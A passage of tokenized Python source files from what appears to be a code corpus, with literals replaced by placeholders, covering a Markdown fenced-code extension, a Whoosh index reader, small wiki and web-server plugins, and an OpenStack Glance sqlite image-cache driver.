sortedlist , "<STR_LIT>" , webapp , snakelet , request , response ) <EOL> def requestFinished ( self , webapp , snakelet , request , response , output = None ) : <EOL> outarray = [ output ] <EOL> self . __doall_WA_returnval ( self . requestPlugins . 
sortedlist , "<STR_LIT>" , webapp , snakelet , request , response , outarray ) <EOL> return outarray [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import markdown <EOL> from markdown . extensions . codehilite import CodeHilite , CodeHiliteExtension <EOL> FENCED_BLOCK_RE = re . compile ( r'<STR_LIT>' , <EOL> re . MULTILINE | re . DOTALL <EOL> ) <EOL> CODE_WRAP = '<STR_LIT>' <EOL> LANG_TAG = '<STR_LIT>' <EOL> class FencedCodeExtension ( markdown . Extension ) : <EOL> def extendMarkdown ( self , md , md_globals ) : <EOL> """<STR_LIT>""" <EOL> md . registerExtension ( self ) <EOL> md . preprocessors . add ( '<STR_LIT>' , <EOL> FencedBlockPreprocessor ( md ) , <EOL> "<STR_LIT>" ) <EOL> class FencedBlockPreprocessor ( markdown . preprocessors . Preprocessor ) : <EOL> def __init__ ( self , md ) : <EOL> markdown . preprocessors . Preprocessor . __init__ ( self , md ) <EOL> self . checked_for_codehilite = False <EOL> self . codehilite_conf = { } <EOL> def getConfig ( self , key ) : <EOL> if key in self . config : <EOL> return self . config [ key ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def run ( self , lines ) : <EOL> """<STR_LIT>""" <EOL> if not self . checked_for_codehilite : <EOL> for ext in self . markdown . registeredExtensions : <EOL> if isinstance ( ext , CodeHiliteExtension ) : <EOL> self . codehilite_conf = ext . config <EOL> break <EOL> self . checked_for_codehilite = True <EOL> text = "<STR_LIT:\n>" . join ( lines ) <EOL> while <NUM_LIT:1> : <EOL> m = FENCED_BLOCK_RE . search ( text ) <EOL> if m : <EOL> lang = '<STR_LIT>' <EOL> if m . group ( '<STR_LIT>' ) : <EOL> lang = LANG_TAG % m . group ( '<STR_LIT>' ) <EOL> if self . codehilite_conf : <EOL> highliter = CodeHilite ( m . group ( '<STR_LIT:code>' ) , <EOL> linenos = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> css_class = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> style = self . codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> lang = ( m . group ( '<STR_LIT>' ) or None ) , <EOL> noclasses = self . 
codehilite_conf [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> code = highliter . hilite ( ) <EOL> else : <EOL> code = CODE_WRAP % ( lang , self . _escape ( m . group ( '<STR_LIT:code>' ) ) ) <EOL> placeholder = self . markdown . htmlStash . store ( code , safe = True ) <EOL> text = '<STR_LIT>' % ( text [ : m . start ( ) ] , placeholder , text [ m . end ( ) : ] ) <EOL> else : <EOL> break <EOL> return text . split ( "<STR_LIT:\n>" ) <EOL> def _escape ( self , txt ) : <EOL> """<STR_LIT>""" <EOL> txt = txt . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) <EOL> txt = txt . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> return txt <EOL> def makeExtension ( configs = None ) : <EOL> return FencedCodeExtension ( configs = configs ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> from bisect import bisect_left <EOL> from whoosh . compat import iteritems , string_type , integer_types , xrange <EOL> from whoosh . filedb . fileindex import Segment <EOL> from whoosh . filedb . fieldcache import FieldCache , DefaultFieldCachingPolicy <EOL> from whoosh . matching import FilterMatcher , ListMatcher <EOL> from whoosh . reading import IndexReader , TermNotFound <EOL> SAVE_BY_DEFAULT = True <EOL> class SegmentReader ( IndexReader ) : <EOL> GZIP_CACHES = False <EOL> def __init__ ( self , storage , schema , segment , generation = None , codec = None ) : <EOL> self . storage = storage <EOL> self . schema = schema <EOL> self . segment = segment <EOL> self . _gen = generation <EOL> self . is_closed = False <EOL> self . _has_deletions = segment . has_deletions ( ) <EOL> self . _dc = segment . doc_count ( ) <EOL> self . _dc_all = segment . doc_count_all ( ) <EOL> if hasattr ( self . segment , "<STR_LIT>" ) : <EOL> self . segid = str ( self . segment . segment_id ( ) ) <EOL> else : <EOL> self . segid = Segment . _random_id ( ) <EOL> if codec is None : <EOL> from whoosh . codec . standard import StdCodec <EOL> codec = StdCodec ( self . storage ) <EOL> self . _codec = codec <EOL> self . _terms = codec . terms_reader ( self . segment ) <EOL> self . _lengths = codec . lengths_reader ( self . segment ) <EOL> self . _stored = codec . stored_fields_reader ( self . segment ) <EOL> self . _vectors = None <EOL> self . _dawg = None <EOL> self . set_caching_policy ( ) <EOL> def _open_vectors ( self ) : <EOL> if self . _vectors : <EOL> return <EOL> self . _vectors = self . _codec . vector_reader ( self . segment ) <EOL> def _open_dawg ( self ) : <EOL> if self . _dawg : <EOL> return <EOL> self . _dawg = self . _codec . word_graph ( self . segment ) <EOL> def has_deletions ( self ) : <EOL> return self . _has_deletions <EOL> def doc_count ( self ) : <EOL> return self . _dc <EOL> def doc_count_all ( self ) : <EOL> return self . 
_dc_all <EOL> def is_deleted ( self , docnum ) : <EOL> return self . segment . is_deleted ( docnum ) <EOL> def generation ( self ) : <EOL> return self . _gen <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . segment ) <EOL> def __contains__ ( self , term ) : <EOL> return term in self . _terms <EOL> def close ( self ) : <EOL> self . _terms . close ( ) <EOL> self . _lengths . close ( ) <EOL> self . _stored . close ( ) <EOL> if self . _vectors : <EOL> self . _vectors . close ( ) <EOL> self . caching_policy = None <EOL> self . is_closed = True <EOL> def stored_fields ( self , docnum ) : <EOL> assert docnum >= <NUM_LIT:0> <EOL> schema = self . schema <EOL> return dict ( item for item in iteritems ( self . _stored [ docnum ] ) <EOL> if item [ <NUM_LIT:0> ] in schema ) <EOL> def all_stored_fields ( self ) : <EOL> is_deleted = self . segment . is_deleted <EOL> sf = self . stored_fields <EOL> for docnum in xrange ( self . _dc_all ) : <EOL> if not is_deleted ( docnum ) : <EOL> yield sf ( docnum ) <EOL> def field_length ( self , fieldname ) : <EOL> return self . _lengths . field_length ( fieldname ) <EOL> def min_field_length ( self , fieldname ) : <EOL> return self . _lengths . min_field_length ( fieldname ) <EOL> def max_field_length ( self , fieldname ) : <EOL> return self . _lengths . max_field_length ( fieldname ) <EOL> def doc_field_length ( self , docnum , fieldname , default = <NUM_LIT:0> ) : <EOL> return self . _lengths . get ( docnum , fieldname , default = default ) <EOL> def has_vector ( self , docnum , fieldname ) : <EOL> if self . schema [ fieldname ] . vector : <EOL> self . _open_vectors ( ) <EOL> return ( docnum , fieldname ) in self . _vectors <EOL> else : <EOL> return False <EOL> def _test_field ( self , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> if self . schema [ fieldname ] . 
format is None : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> def all_terms ( self ) : <EOL> schema = self . schema <EOL> return ( ( fieldname , text ) for fieldname , text in self . _terms . keys ( ) <EOL> if fieldname in schema ) <EOL> def terms_from ( self , fieldname , prefix ) : <EOL> self . _test_field ( fieldname ) <EOL> schema = self . schema <EOL> return ( ( fname , text ) for fname , text <EOL> in self . _terms . keys_from ( ( fieldname , prefix ) ) <EOL> if fname in schema ) <EOL> def term_info ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms [ fieldname , text ] <EOL> except KeyError : <EOL> raise TermNotFound ( "<STR_LIT>" % ( fieldname , text ) ) <EOL> def _texts_in_fieldcache ( self , fieldname , prefix = '<STR_LIT>' ) : <EOL> texts = self . fieldcache ( fieldname ) . texts [ <NUM_LIT:1> : ] <EOL> if prefix : <EOL> i = bisect_left ( texts , prefix ) <EOL> while i < len ( texts ) and texts [ i ] . startswith ( prefix ) : <EOL> yield texts [ i ] <EOL> i += <NUM_LIT:1> <EOL> else : <EOL> for text in texts : <EOL> yield text <EOL> def expand_prefix ( self , fieldname , prefix ) : <EOL> self . _test_field ( fieldname ) <EOL> if self . fieldcache_loaded ( fieldname ) : <EOL> return self . _texts_in_fieldcache ( fieldname , prefix ) <EOL> else : <EOL> return IndexReader . expand_prefix ( self , fieldname , prefix ) <EOL> def lexicon ( self , fieldname ) : <EOL> self . _test_field ( fieldname ) <EOL> if self . fieldcache_loaded ( fieldname ) : <EOL> return self . _texts_in_fieldcache ( fieldname ) <EOL> else : <EOL> return IndexReader . lexicon ( self , fieldname ) <EOL> def __iter__ ( self ) : <EOL> schema = self . schema <EOL> return ( ( term , terminfo ) for term , terminfo in self . _terms . items ( ) <EOL> if term [ <NUM_LIT:0> ] in schema ) <EOL> def iter_from ( self , fieldname , text ) : <EOL> schema = self . schema <EOL> self . 
_test_field ( fieldname ) <EOL> for term , terminfo in self . _terms . items_from ( ( fieldname , text ) ) : <EOL> if term [ <NUM_LIT:0> ] not in schema : <EOL> continue <EOL> yield ( term , terminfo ) <EOL> def frequency ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms . frequency ( ( fieldname , text ) ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> def doc_frequency ( self , fieldname , text ) : <EOL> self . _test_field ( fieldname ) <EOL> try : <EOL> return self . _terms . doc_frequency ( ( fieldname , text ) ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> def postings ( self , fieldname , text , scorer = None ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> format_ = self . schema [ fieldname ] . format <EOL> matcher = self . _terms . matcher ( fieldname , text , format_ , scorer = scorer ) <EOL> deleted = self . segment . deleted <EOL> if deleted : <EOL> matcher = FilterMatcher ( matcher , deleted , exclude = True ) <EOL> return matcher <EOL> def vector ( self , docnum , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> raise TermNotFound ( "<STR_LIT>" % fieldname ) <EOL> vformat = self . schema [ fieldname ] . vector <EOL> if not vformat : <EOL> raise Exception ( "<STR_LIT>" % fieldname ) <EOL> self . _open_vectors ( ) <EOL> return self . _vectors . matcher ( docnum , fieldname , vformat ) <EOL> def has_word_graph ( self , fieldname ) : <EOL> if fieldname not in self . schema : <EOL> return False <EOL> if not self . schema [ fieldname ] . spelling : <EOL> return False <EOL> self . _open_dawg ( ) <EOL> return fieldname in self . _dawg <EOL> def word_graph ( self , fieldname ) : <EOL> if not self . has_word_graph ( fieldname ) : <EOL> raise Exception ( "<STR_LIT>" % fieldname ) <EOL> return self . _dawg . 
edge ( fieldname ) <EOL> def supports_caches ( self ) : <EOL> return True <EOL> def set_caching_policy ( self , cp = None , save = True , storage = None ) : <EOL> """<STR_LIT>""" <EOL> if not cp : <EOL> if save and storage is None : <EOL> storage = self . storage <EOL> elif not save : <EOL> storage = None <EOL> cp = DefaultFieldCachingPolicy ( self . segment . segment_id ( ) , <EOL> storage = storage ) <EOL> if type ( cp ) is type : <EOL> cp = cp ( ) <EOL> self . caching_policy = cp <EOL> def _fieldkey ( self , fieldname ) : <EOL> return "<STR_LIT>" % ( self . segid , fieldname ) <EOL> def fieldcache ( self , fieldname , save = SAVE_BY_DEFAULT ) : <EOL> """<STR_LIT>""" <EOL> key = self . _fieldkey ( fieldname ) <EOL> fc = self . caching_policy . get ( key ) <EOL> if not fc : <EOL> fc = FieldCache . from_field ( self , fieldname ) <EOL> self . caching_policy . put ( key , fc , save = save ) <EOL> return fc <EOL> def fieldcache_available ( self , fieldname ) : <EOL> """<STR_LIT>""" <EOL> return self . _fieldkey ( fieldname ) in self . caching_policy <EOL> def fieldcache_loaded ( self , fieldname ) : <EOL> """<STR_LIT>""" <EOL> return self . caching_policy . is_loaded ( self . _fieldkey ( fieldname ) ) <EOL> def unload_fieldcache ( self , name ) : <EOL> self . caching_policy . delete ( self . _fieldkey ( name ) ) </s>
<s> from whoosh . util import rcompile <EOL> class Tagger ( object ) : <EOL> """<STR_LIT>""" <EOL> def match ( self , parser , text , pos ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class RegexTagger ( Tagger ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expr ) : <EOL> self . expr = rcompile ( expr ) <EOL> def match ( self , parser , text , pos ) : <EOL> match = self . expr . match ( text , pos ) <EOL> if match : <EOL> node = self . create ( parser , match ) <EOL> if node is None : <EOL> raise Exception ( "<STR_LIT>" <EOL> % ( self . __class__ . __name__ ) ) <EOL> return node . set_range ( match . start ( ) , match . end ( ) ) <EOL> def create ( self , parser , match ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class FnTagger ( RegexTagger ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expr , fn ) : <EOL> RegexTagger . __init__ ( self , expr ) <EOL> self . fn = fn <EOL> def create ( self , parser , match ) : <EOL> return self . fn ( ** match . groupdict ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> try : <EOL> import json <EOL> except : <EOL> import simplejson as json <EOL> class TimedBucket : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , granularity , expiration ) : <EOL> self . granularity = granularity <EOL> self . expiration = expiration <EOL> self . buckets = { } <EOL> self . start = time . time ( ) <EOL> def addToBucket ( self , value = <NUM_LIT:1> ) : <EOL> now = time . time ( ) <EOL> currslot = int ( now ) / self . granularity * self . granularity <EOL> if currslot in self . buckets . keys ( ) : <EOL> self . buckets [ currslot ] = self . buckets [ currslot ] + value <EOL> else : <EOL> self . buckets [ currslot ] = value <EOL> try : <EOL> del self . buckets [ currslot - self . expiration ] <EOL> except : <EOL> pass <EOL> def getBuckets ( self ) : <EOL> return self . buckets <EOL> def getJSON ( self ) : <EOL> return json . dumps ( self . buckets ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> a = TimedBucket ( <NUM_LIT:5> , <NUM_LIT:15> ) <EOL> for x in range ( <NUM_LIT> ) : <EOL> a . addToBucket ( <NUM_LIT:1> ) <EOL> print a . getBuckets ( ) <EOL> time . sleep ( <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> import yaki . Engine , yaki . Store , yaki . Locale <EOL> from BeautifulSoup import * <EOL> from yaki . Utils import * <EOL> import urllib <EOL> class ReferrersWikiPlugin ( yaki . Plugins . WikiPlugin ) : <EOL> def __init__ ( self , registry , webapp ) : <EOL> registry . register ( '<STR_LIT>' , self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ac = webapp . getContext ( ) <EOL> self . i18n = yaki . Locale . i18n [ self . ac . locale ] <EOL> def run ( self , serial , tag , tagname , pagename , soup , request , response ) : <EOL> buffer = [ u'<STR_LIT>' % ( self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] , self . i18n [ '<STR_LIT>' ] ) ] <EOL> data = self . ac . referrers . getData ( ) <EOL> pages = data . keys ( ) <EOL> pages . sort ( lambda b , a : cmp ( data [ a ] [ '<STR_LIT>' ] , data [ b ] [ '<STR_LIT>' ] ) ) <EOL> for page in pages : <EOL> page = urllib . unquote ( page ) <EOL> try : <EOL> row = [ u'<STR_LIT>' % ( self . ac . base + page , self . i18n [ '<STR_LIT>' ] % timeSince ( self . i18n , data [ page ] [ '<STR_LIT>' ] ) , self . ac . indexer . pageinfo [ page ] [ '<STR_LIT:title>' ] , self . ac . indexer . pageinfo [ page ] [ '<STR_LIT>' ] ) ] <EOL> referrers = data [ page ] [ '<STR_LIT>' ] . keys ( ) <EOL> referrers . sort ( lambda b , a : cmp ( data [ page ] [ '<STR_LIT>' ] [ a ] [ '<STR_LIT>' ] , data [ page ] [ '<STR_LIT>' ] [ b ] [ '<STR_LIT>' ] ) ) <EOL> for referrer in referrers : <EOL> row . append ( u'<STR_LIT>' % ( referrer , self . i18n [ '<STR_LIT>' ] % timeSince ( self . i18n , data [ page ] [ '<STR_LIT>' ] [ referrer ] [ '<STR_LIT>' ] ) , shrink ( referrer , <NUM_LIT:50> ) , data [ page ] [ '<STR_LIT>' ] [ referrer ] [ '<STR_LIT:count>' ] ) ) <EOL> buffer . append ( u'<STR_LIT>' . join ( row ) [ : - <NUM_LIT:5> ] ) <EOL> buffer . append ( u'<STR_LIT>' ) <EOL> except : <EOL> print "<STR_LIT>" % page <EOL> pass <EOL> buffer . append ( u'<STR_LIT>' ) <EOL> tag . 
replaceWith ( u'<STR_LIT>' . join ( buffer ) ) </s>
<s> import cgi , urllib <EOL> from snakeserver . snakelet import Snakelet <EOL> import logging <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> class Manager ( Snakelet ) : <EOL> def getDescription ( self ) : <EOL> return "<STR_LIT>" <EOL> def requiresSession ( self ) : <EOL> return self . SESSION_LOGIN_REQUIRED <EOL> def serve ( self , request , response ) : <EOL> f = request . getForm ( ) <EOL> if f . has_key ( '<STR_LIT:action>' ) : <EOL> action = f [ '<STR_LIT:action>' ] <EOL> if action == '<STR_LIT>' : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> self . getWebApp ( ) . server . shutdown ( ) <EOL> return <EOL> elif action in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> name = f . get ( '<STR_LIT:name>' ) or "<STR_LIT>" <EOL> vhost = f [ '<STR_LIT>' ] <EOL> urlname = urllib . quote_plus ( name ) <EOL> if action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . enableWebApp ( vhost , name , False ) <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> if not self . getWebApp ( ) . isEnabled ( ) : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> return <EOL> elif action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . enableWebApp ( vhost , name , True ) <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> elif action == "<STR_LIT>" : <EOL> realname = f . get ( '<STR_LIT>' ) <EOL> if self . getWebApp ( ) . server . reloadWebApp ( vhost , name , realname ) : <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> else : <EOL> request . getContext ( ) . actionmsg = "<STR_LIT>" <EOL> if not urlname : <EOL> self . redirect ( "<STR_LIT>" , request , response ) <EOL> return <EOL> elif action == "<STR_LIT>" : <EOL> self . getWebApp ( ) . server . clearWebAppCache ( vhost , name ) <EOL> request . getContext ( ) . 
actionmsg = "<STR_LIT>" <EOL> elif action == "<STR_LIT>" : <EOL> selfWebApp = self . getWebApp ( ) <EOL> destroyedSelf = ( vhost == selfWebApp . getVirtualHost ( ) [ <NUM_LIT:0> ] ) and ( name == selfWebApp . getURLprefix ( ) ) <EOL> log . info ( "<STR_LIT>" % ( name , vhost ) ) <EOL> selfWebApp . server . unloadWebApp ( vhost , name ) <EOL> if destroyedSelf : <EOL> out = response . getOutput ( ) <EOL> print >> out , '<STR_LIT>' <EOL> print >> out , "<STR_LIT>" <EOL> return <EOL> self . redirect ( selfWebApp . getURLprefix ( ) + "<STR_LIT>" , request , response ) <EOL> return <EOL> self . redirect ( "<STR_LIT>" + urlname , request , response ) <EOL> elif action == '<STR_LIT>' : <EOL> webapp = f [ '<STR_LIT>' ] <EOL> vhost = f [ '<STR_LIT>' ] <EOL> urlname = urllib . quote_plus ( webapp ) <EOL> sessionid = f [ '<STR_LIT:id>' ] <EOL> activesessions = self . getWebApp ( ) . server . allWebApps [ ( vhost , webapp ) ] . sessions <EOL> if sessionid == '<STR_LIT:all>' : <EOL> for ( sessionID , session ) in activesessions . items ( ) [ : ] : <EOL> log . info ( "<STR_LIT>" + sessionID ) <EOL> session . destroy ( external = True ) <EOL> del activesessions [ sessionID ] <EOL> else : <EOL> log . info ( "<STR_LIT>" + sessionid ) <EOL> activesessions [ sessionid ] . destroy ( external = True ) <EOL> del activesessions [ sessionid ] <EOL> self . redirect ( "<STR_LIT>" + urlname , request , response ) <EOL> else : <EOL> response . sendError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> else : <EOL> self . redirect ( self . getWebApp ( ) . getURLprefix ( ) + "<STR_LIT>" , request , response ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from contextlib import contextmanager <EOL> import datetime <EOL> import itertools <EOL> import logging <EOL> import os <EOL> import stat <EOL> import time <EOL> from eventlet import sleep , timeout <EOL> import sqlite3 <EOL> from glance . common import cfg <EOL> from glance . common import exception <EOL> from glance . image_cache . drivers import base <EOL> logger = logging . getLogger ( __name__ ) <EOL> DEFAULT_SQL_CALL_TIMEOUT = <NUM_LIT:2> <EOL> class SqliteConnection ( sqlite3 . Connection ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . timeout_seconds = kwargs . get ( '<STR_LIT>' , DEFAULT_SQL_CALL_TIMEOUT ) <EOL> kwargs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> sqlite3 . Connection . __init__ ( self , * args , ** kwargs ) <EOL> def _timeout ( self , call ) : <EOL> with timeout . Timeout ( self . timeout_seconds ) : <EOL> while True : <EOL> try : <EOL> return call ( ) <EOL> except sqlite3 . OperationalError , e : <EOL> if '<STR_LIT>' not in str ( e ) : <EOL> raise <EOL> sleep ( <NUM_LIT> ) <EOL> def execute ( self , * args , ** kwargs ) : <EOL> return self . _timeout ( lambda : sqlite3 . Connection . execute ( <EOL> self , * args , ** kwargs ) ) <EOL> def commit ( self ) : <EOL> return self . _timeout ( lambda : sqlite3 . Connection . commit ( self ) ) <EOL> def dict_factory ( cur , row ) : <EOL> return dict ( <EOL> ( ( col [ <NUM_LIT:0> ] , row [ idx ] ) for idx , col in enumerate ( cur . description ) ) ) <EOL> class Driver ( base . Driver ) : <EOL> """<STR_LIT>""" <EOL> opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , default = '<STR_LIT>' ) , <EOL> ] <EOL> def configure ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( Driver , self ) . configure ( ) <EOL> self . conf . register_opts ( self . opts ) <EOL> self . initialize_db ( ) <EOL> def initialize_db ( self ) : <EOL> db = self . conf . image_cache_sqlite_db <EOL> self . db_path = os . path . 
join ( self . base_dir , db ) <EOL> try : <EOL> conn = sqlite3 . connect ( self . db_path , check_same_thread = False , <EOL> factory = SqliteConnection ) <EOL> conn . executescript ( """<STR_LIT>""" ) <EOL> conn . close ( ) <EOL> except sqlite3 . DatabaseError , e : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % e <EOL> logger . error ( msg ) <EOL> raise exception . BadDriverConfiguration ( driver_name = '<STR_LIT>' , <EOL> reason = msg ) <EOL> def get_cache_size ( self ) : <EOL> """<STR_LIT>""" <EOL> sizes = [ ] <EOL> for path in self . get_cache_files ( self . base_dir ) : <EOL> if path == self . db_path : <EOL> continue <EOL> file_info = os . stat ( path ) <EOL> sizes . append ( file_info [ stat . ST_SIZE ] ) <EOL> return sum ( sizes ) <EOL> def get_hit_count ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_cached ( image_id ) : <EOL> return <NUM_LIT:0> <EOL> hits = <NUM_LIT:0> <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" , <EOL> ( image_id , ) ) <EOL> hits = cur . fetchone ( ) [ <NUM_LIT:0> ] <EOL> return hits <EOL> def get_cached_images ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( _ ( "<STR_LIT>" ) ) <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" ) <EOL> cur . row_factory = dict_factory <EOL> return [ r for r in cur ] <EOL> def is_cached ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . exists ( self . get_image_filepath ( image_id ) ) <EOL> def is_cacheable ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return not ( self . is_cached ( image_id ) or <EOL> self . is_being_cached ( image_id ) ) <EOL> def is_being_cached ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> return os . path . exists ( path ) <EOL> def is_queued ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> return os . path . 
exists ( path ) <EOL> def delete_all_cached_images ( self ) : <EOL> """<STR_LIT>""" <EOL> deleted = <NUM_LIT:0> <EOL> with self . get_db ( ) as db : <EOL> for path in self . get_cache_files ( self . base_dir ) : <EOL> delete_cached_file ( path ) <EOL> deleted += <NUM_LIT:1> <EOL> db . execute ( """<STR_LIT>""" ) <EOL> db . commit ( ) <EOL> return deleted <EOL> def delete_cached_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id ) <EOL> with self . get_db ( ) as db : <EOL> delete_cached_file ( path ) <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( image_id , ) ) <EOL> db . commit ( ) <EOL> def delete_all_queued_images ( self ) : <EOL> """<STR_LIT>""" <EOL> files = [ f for f in self . get_cache_files ( self . queue_dir ) ] <EOL> for file in files : <EOL> os . unlink ( file ) <EOL> return len ( files ) <EOL> def delete_queued_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> if os . path . exists ( path ) : <EOL> os . unlink ( path ) <EOL> def clean ( self , stall_time = None ) : <EOL> """<STR_LIT>""" <EOL> self . delete_invalid_files ( ) <EOL> if stall_time is None : <EOL> stall_time = self . conf . image_cache_stall_time <EOL> now = time . time ( ) <EOL> older_than = now - stall_time <EOL> self . delete_stalled_files ( older_than ) <EOL> def get_least_recently_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . get_db ( ) as db : <EOL> cur = db . execute ( """<STR_LIT>""" ) <EOL> image_id = cur . fetchone ( ) [ <NUM_LIT:0> ] <EOL> path = self . get_image_filepath ( image_id ) <EOL> file_info = os . stat ( path ) <EOL> return image_id , file_info [ stat . ST_SIZE ] <EOL> @ contextmanager <EOL> def open_for_write ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> incomplete_path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> def commit ( ) : <EOL> with self . get_db ( ) as db : <EOL> final_path = self . 
get_image_filepath ( image_id ) <EOL> logger . debug ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> dict ( incomplete_path = incomplete_path , <EOL> final_path = final_path ) ) <EOL> os . rename ( incomplete_path , final_path ) <EOL> if self . is_queued ( image_id ) : <EOL> os . unlink ( self . get_image_filepath ( image_id , '<STR_LIT>' ) ) <EOL> filesize = os . path . getsize ( final_path ) <EOL> now = time . time ( ) <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( image_id , now , filesize ) ) <EOL> db . commit ( ) <EOL> def rollback ( e ) : <EOL> with self . get_db ( ) as db : <EOL> if os . path . exists ( incomplete_path ) : <EOL> invalid_path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> logger . debug ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % locals ( ) ) <EOL> os . rename ( incomplete_path , invalid_path ) <EOL> db . execute ( """<STR_LIT>""" , ( image_id , ) ) <EOL> db . commit ( ) <EOL> try : <EOL> with open ( incomplete_path , '<STR_LIT:wb>' ) as cache_file : <EOL> yield cache_file <EOL> except Exception as e : <EOL> rollback ( e ) <EOL> raise <EOL> else : <EOL> commit ( ) <EOL> @ contextmanager <EOL> def open_for_read ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> path = self . get_image_filepath ( image_id ) <EOL> with open ( path , '<STR_LIT:rb>' ) as cache_file : <EOL> yield cache_file <EOL> now = time . time ( ) <EOL> with self . get_db ( ) as db : <EOL> db . execute ( """<STR_LIT>""" , <EOL> ( now , image_id ) ) <EOL> db . commit ( ) <EOL> @ contextmanager <EOL> def get_db ( self ) : <EOL> """<STR_LIT>""" <EOL> conn = sqlite3 . connect ( self . db_path , check_same_thread = False , <EOL> factory = SqliteConnection ) <EOL> conn . row_factory = sqlite3 . Row <EOL> conn . text_factory = str <EOL> conn . execute ( '<STR_LIT>' ) <EOL> conn . execute ( '<STR_LIT>' ) <EOL> conn . execute ( '<STR_LIT>' ) <EOL> try : <EOL> yield conn <EOL> except sqlite3 . DatabaseError , e : <EOL> msg = _ ( "<STR_LIT>" ) % e <EOL> logger . 
